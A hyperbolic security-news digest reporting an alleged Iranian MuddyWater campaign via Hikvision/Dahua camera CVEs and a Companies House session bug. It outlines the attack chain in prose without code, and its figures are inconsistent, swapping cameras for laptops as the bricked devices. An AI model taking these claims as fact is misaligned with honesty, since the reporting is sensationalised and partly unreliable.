50 TB Citizen Files Hijacked by Tehran, 200k Cams Bricked: $18M Bill Lands on US-Canada Defense Tab

TL;DR

• Iranian threat actor MuddyWater compromised US and Canadian networks since February 2026, exfiltrating 50TB of data via Hikvision camera exploits
• UK Companies House data glitch exposed private details of over 5 million companies due to back-key navigation bug

😈 50 TB Heist: Iranian Hackers Turn US-Canada Cameras Into Spygrid, Brick 200k Devices

50 TB of your files just became Tehran’s Netflix queue—then they bricked 200k laptops for the credits 😈💥 That’s every Hik camera from DC to Calgary serving Mullah-cam before the wipe. Defense contractors got the bill: $18 M popcorn fee. Taxpayers—feeling the burn yet?

Since 1 Feb, the Iranian crew MuddyWater has treated U.S. and Canadian networks like an open buffet, slipping in through Hikvision and Dahua cameras left naked by five-year-old bugs (CVE-2017-7921, CVE-2021-33044). Inside, they parked the Dindoor backdoor, funneled 50 TB of blueprints and live surveillance feeds to Wasabi buckets via abused Rclone, and then torched >200 000 laptops and phones with a Shamoon-style wiper. Estimated productivity punch in the face: $12–18 M.

How did a webcam become a spy?

• Step 1: Scan the internet for cameras still running 2017 firmware.
• Step 2: Bypass login, drop a tiny loader (Stagecomp), download Python backdoor (Fakeset) from a CDN you already trust.
• Step 3: Chain scheduled-task side-loads, Telegram bots, and Starlink IPs for C2—because why not hijack consumer satellite for state espionage?
• Step 4: Hoover data, wipe endpoints, vanish.

Impacts in one painful gulp

• Battlefield intel: Real-time feeds from defense perimeters handed to Iran on a platter.
• Wallet bleed: Eight-figure downtime bill for Fortune 500s.
• Supply-chain rot: Malware bundled with legitimate software installers, so your next “update” may come with a Tehran postmark.

What now?

Patch every Hikvision/Dahua firmware newer than 2023, firewall cameras into quarantine VLANs, and hunt for Rclone with weird destination strings. Anything less is just leaving the key under the doormat—for someone who already emptied the safe.

Outlook: short, medium, long—choose your ache

• 0–3 mo: More wiper tantrums in finance & health while credentials stay valid.
• 3–12 mo: Expect firmware supply-chain poison and satellite-ground-station hijacks.
• 12 mo+: Regulators will finally mandate signed updates; until then, it’s BYO tourniquet.

If your security strategy still trusts a $60 camera to guard a billion-dollar network, congratulations—you’ve built a skyscraper on quicksand and handed Tehran the hose.

😱 Back-Button Blunder Exposes 5M UK Companies for 5 Months

5M UK firms left naked by a BACK button 😱—like leaving the vault open for 5 MONTHS while you grab coffee! 🏴󠁧󠁢󠁥󠁮󠁧󠁾 Directors’ home addys & DOBs one click away. ICO “investigating” = slow-motion slap. Check your filings NOW—unless you fancy surprise fraud charges.

A single October 2025 code tweak turned the UK’s corporate registry into a peep-show: press the browser “back” key and—boom—any logged-in dashboard flipped open, no password, no consent. For five months every Companies House filer (read: 5 million firms, 100 % of the register) had birthdays, home addresses and corporate e-mails on tap. Exploiters needed 15 days on average to rummage around, spoof directors or queue fake filings. Cue 13 Mar 2026, 13:00 GMT: service yanked offline; 72 h later a patched portal crawled back, still blushing.

Privacy: >5 million directors’ home addresses exposed → identity-theft kits now retail-ready.
Governance: fraudulent filings can slip through → up to 5 years in the slammer under fraud laws, yet policing is reactive.
Trust: credit agencies, lenders, insurers feast on this data → poisoned well could hike due-diligence costs for every UK PLC.

Regulators (ICO, NCSC) sprinted in, emails fired off to every registered mailbox: “Screenshot your filings, scream if something’s off.” An internal code-review is promised, plus multi-factor authentication—something the site should have worn like underwear since 2015. Meanwhile, Ghost Mail, Dan Neidle and random tweeters converged on the same culprit: sloppy session-handling in last autumn’s “improvement” release.

Short-term cheat-sheet

• Next 90 days: forensics hunt for doctored docs; ICO preps compliance love-letters.
• Q4-2026: MFA finally mandatory; expect grumpy finance directors juggling fobs.
• 2027-28: amended Computer Misuse Act may criminalise “negligent navigation bugs,” giving CIOs nightmares and lawyers billable dreams.

The takeaway: if a back-button can unpick the national company vault, imagine what a determined scoundrel with a scraper and a shopping list could do. Until Whitehall codes like it’s 2026, not 1996, every “Download PDF” click is a dice-roll for UK plc.

In Other News

• OpenSSL 3.5, OpenSSH 10.2, and libtiff updates released with Post-Quantum Cryptography warnings and critical vulnerability patches
• Microsoft Purview integrates with Fabric to enforce data governance, DLP, and AI usage controls across enterprise data estates
• Jozu launches Agent Guard with hypervisor isolation and local policy enforcement to prevent AI agent governance bypass
• Systemd 260 removes legacy SysV init support, raises baseline to Linux 5.10, glibc 2.34, and OpenSSL 3.0 for modern Linux systems